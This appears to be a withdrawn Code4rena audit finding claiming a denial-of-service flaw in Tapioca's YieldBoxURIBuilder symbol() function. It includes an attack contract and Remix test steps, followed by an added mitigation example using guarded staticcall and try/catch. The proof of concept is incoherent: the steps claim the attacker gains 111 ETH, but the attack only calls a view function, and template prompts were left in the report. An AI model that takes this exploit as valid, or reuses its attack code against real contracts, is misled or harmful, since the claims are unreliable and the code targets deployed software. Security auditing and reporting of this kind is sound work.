code-423n4 / 2023-07-tapioca-findings


[M-02] SWC-113 DoS with Failed Call #310

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/Tapioca-DAO/YieldBox/blob/f5ad271b2dcab8b643b7cf622c2d6a128e109999/contracts/YieldBoxURIBuilder.sol#L59

Vulnerability details

Impact

Detailed description of the impact of this finding.

This call is executed following another call within the same transaction. It is possible that the call never gets executed if a prior call fails permanently. This might be caused intentionally by a malicious callee. 

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.

Vulnerable File

/YieldBoxURIBuilder.sol

Vulnerable URL

https://github.com/Tapioca-DAO/YieldBox/blob/f5ad271b2dcab8b643b7cf622c2d6a128e109999/contracts/YieldBoxURIBuilder.sol#L59

Vulnerable code

 return string(abi.encodePacked(token.safeSymbol(), " (", asset.strategy.name(), ")"));

DoS Test Case

NB: Using Remix Dev Foundry Deployment
1. Switch to the first account (as Alice) and deploy the victim contract.
2. Switch to the second account (as Eve) and deploy the attack contract.
3. Switch to the first account (as Alice), select 111 ETH, enter the address and string values, and click the symbol() button.
4. Switch to the second account (as Eve), select 111 ETH, paste Alice's victim contract address into the input box next to the attack() button, and then click the attack() button.
5. In account 2 (Eve), click the getBalance button; the balance is +111 ETH.

PoC

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;
import "/2023-07-tapioca/tap-token-audit/node_modules/@openzeppelin/contracts/utils/Strings.sol";
import "/2023-07-tapioca/tap-token-audit/node_modules/@boringcrypto/boring-solidity/contracts/libraries/Base64.sol";
import "/2023-07-tapioca/tap-token-audit/node_modules/@boringcrypto/boring-solidity/contracts/libraries/BoringERC20.sol";
import "./interfaces/IYieldBox.sol";
import "./NativeTokenFactory.sol";
import "./YieldBoxURIBuilder.sol";
import "/2023-07-tapioca/YieldBox/contracts/enums/YieldBoxTokenType.sol";
import "/2023-07-tapioca/YieldBox/contracts/interfaces/IStrategy.sol";

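contract AttackYieldBoxURIBuilder is YieldBoxURIBuilder {
    // Victim YieldBoxURIBuilder instance targeted by attack()
    YieldBoxURIBuilder public yieldboxuribuilder;

    constructor(YieldBoxURIBuilder _yieldboxuribuilder) {
        yieldboxuribuilder = YieldBoxURIBuilder(_yieldboxuribuilder);
    }

    // Calls symbol() on the victim, passing the victim's own address as both
    // the token contract and the strategy
    function attack() public payable {
        yieldboxuribuilder.symbol(Asset(TokenType(1), address(yieldboxuribuilder), IStrategy(address(yieldboxuribuilder)), 111), "ETH");
    }

    // Returns the ETH balance held by this contract
    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}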

Tools Used

MythX
Visual Studio Code
Foundry
Remix IDE

Recommended Mitigation Steps

If possible, refactor the code such that each transaction only executes one external call or make sure that all callees can be trusted (i.e. they're part of your own codebase).

Assessed type

DoS
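
The mitigation described above, as an added example that is not part of the submission or of the YieldBox code base: a label builder in the shape of the reported line, first with a direct external name() call and then with that call isolated so a reverting or misbehaving callee yields a placeholder. INamed, RevertingStrategy, LabelBuilder, safeName, decodeString, the "???" placeholder and the 50,000 gas cap are all assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;

// Added example: every name below is hypothetical, none is YieldBox code.
interface INamed {
    function name() external view returns (string memory);
}

// Constructed callee whose name() always reverts.
contract RevertingStrategy is INamed {
    function name() external pure override returns (string memory) {
        revert("name unavailable");
    }
}

contract LabelBuilder {
    // Unguarded: a revert in strategy.name() reverts the whole call.
    function labelUnguarded(string calldata sym, INamed strategy) external view returns (string memory) {
        return string(abi.encodePacked(sym, " (", strategy.name(), ")"));
    }

    // Guarded: a failing callee yields a placeholder instead of a revert.
    function labelGuarded(string calldata sym, INamed strategy) external view returns (string memory) {
        return string(abi.encodePacked(sym, " (", safeName(address(strategy)), ")"));
    }

    // Low-level staticcall reports failure in `ok` instead of bubbling it up.
    // The gas cap (assumed value) bounds what a hostile callee can consume.
    function safeName(address target) public view returns (string memory) {
        (bool ok, bytes memory data) = target.staticcall{gas: 50_000}(
            abi.encodeWithSelector(INamed.name.selector)
        );
        if (!ok) return "???";
        // abi.decode reverts on malformed return data, so decode behind an
        // external call to this contract that try/catch can contain.
        try this.decodeString(data) returns (string memory s) {
            return s;
        } catch {
            return "???";
        }
    }

    function decodeString(bytes calldata data) external pure returns (string memory) {
        return abi.decode(data, (string));
    }
}
```

With a deployed RevertingStrategy as the second argument and "SYM" as the first, labelUnguarded reverts while labelGuarded returns "SYM (???)".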

code423n4 commented 1 year ago

Withdrawn by debo